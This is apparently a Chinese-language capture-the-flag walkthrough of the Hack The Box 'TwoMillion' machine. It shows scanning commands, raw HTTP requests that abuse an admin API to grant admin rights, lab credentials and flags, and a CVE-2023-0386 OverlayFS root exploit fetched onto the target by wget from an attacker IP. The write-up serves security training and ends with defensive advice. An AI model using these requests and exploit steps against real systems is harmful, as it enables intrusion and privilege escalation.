[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升
字数 1380 2025-08-22 12:23:41
TwoMillion 靶机渗透测试完整教学文档
1. 信息收集阶段
1.1 初始扫描
$ sudo masscan -p1-65535,U:1-65535 10.10.11.221 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.221
扫描结果:
- 22/tcp: OpenSSH 8.9p1 Ubuntu 3ubuntu0.1
- 80/tcp: nginx (重定向到 http://2million.htb/)
1.2 添加主机名到hosts文件
$ echo '10.10.11.221 2million.htb' >> /etc/hosts
2. Web应用分析
2.1 目录扫描
$ dirsearch -u http://2million.htb
2.2 JS代码反混淆
发现混淆的JavaScript代码:view-source:http://2million.htb/js/inviteapi.min.js
关键函数分析:
function verifyInviteCode(code) {
var formData = {"code": code};
$.ajax({
type: "POST",
dataType: "json",
data: formData,
url: '/api/v1/invite/verify',
success: function(response) { console.log(response); },
error: function(response) { console.log(response); }
});
}
function makeInviteCode() {
$.ajax({
type: "POST",
dataType: "json",
url: '/api/v1/invite/generate',
success: function(response) { console.log(response); },
error: function(response) { console.log(response); }
});
}
2.3 解码ROT13提示
$ echo 'Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
输出:To generate the invite code, make a POST request to /api/v1/invite/generate
3. API利用
3.1 API端点列表
用户API:
- GET /api/v1 - 路由列表
- GET /api/v1/invite/how/to/generate - 邀请码生成说明
- GET /api/v1/invite/generate - 生成邀请码
- GET /api/v1/invite/verify - 验证邀请码
- GET /api/v1/user/auth - 检查用户是否已认证
- GET /api/v1/user/vpn/generate - 生成新的VPN配置
- GET /api/v1/user/vpn/regenerate - 重新生成VPN配置
- GET /api/v1/user/vpn/download - 下载OVPN文件
- POST /api/v1/user/register - 注册新用户
- POST /api/v1/user/login - 登录已有用户
管理员API:
- GET /api/v1/admin/auth - 检查用户是否为管理员
- POST /api/v1/admin/vpn/generate - 为特定用户生成VPN
- PUT /api/v1/admin/settings/update - 更新用户设置
3.2 生成邀请码
POST /api/v1/invite/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
响应示例:DATV8-W1GS1-U5MY1-E43OY
3.3 权限提升为管理员
PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 47
{"email":"maptnh@gmail.com","is_admin":1}
3.4 生成VPN配置
POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 35
{"username":"maptnh@gmail.com"}
4. SSH访问
使用获取的凭据登录:
$ ssh admin@10.10.11.221
username: admin
password: SuperDuperPass123
获取user flag:
6a9c99994e4334df9edc1fc13bca997b
5. 权限提升:OverlayFS漏洞利用
5.1 发现漏洞提示
在/var/spool/mail/admin发现邮件:
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Hey admin,
I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.
5.2 利用CVE-2023-0386
- 下载漏洞利用代码:
$ git clone https://github.com/puckiestyle/CVE-2023-0386.git
$ tar -czvf CVE-2023-0386.tar.gz ./CVE-2023-0386
- 在目标机器上:
admin@2million:/tmp$ wget http://10.10.16.16/CVE-2023-0386.tar.gz
admin@2million:/tmp$ tar -zxvf CVE-2023-0386.tar.gz
admin@2million:/tmp/CVE-2023-0386$ make all
admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
admin@2million:/tmp/CVE-2023-0386$ ./exp
- 获取root flag:
35ed55b48c40b4a093970f40eda0281c
6. 关键知识点总结
- 信息收集:使用masscan和nmap进行端口扫描,识别开放服务
- JS反混淆:分析混淆的JavaScript代码发现API端点
- API滥用:
- 通过ROT13解码发现API端点
- 利用PUT方法修改用户权限
- 滥用管理员API生成VPN配置
- 权限提升:
- 识别系统未修补的OverlayFS漏洞(CVE-2023-0386)
- 编译并执行本地提权漏洞利用程序
7. 防御建议
- 及时更新操作系统内核,修补已知漏洞
- 实施严格的API权限控制,避免普通用户提升权限
- 对敏感操作实施多因素认证
- 避免在前端暴露API文档或提示信息
- 实施输入验证和输出编码防止注入攻击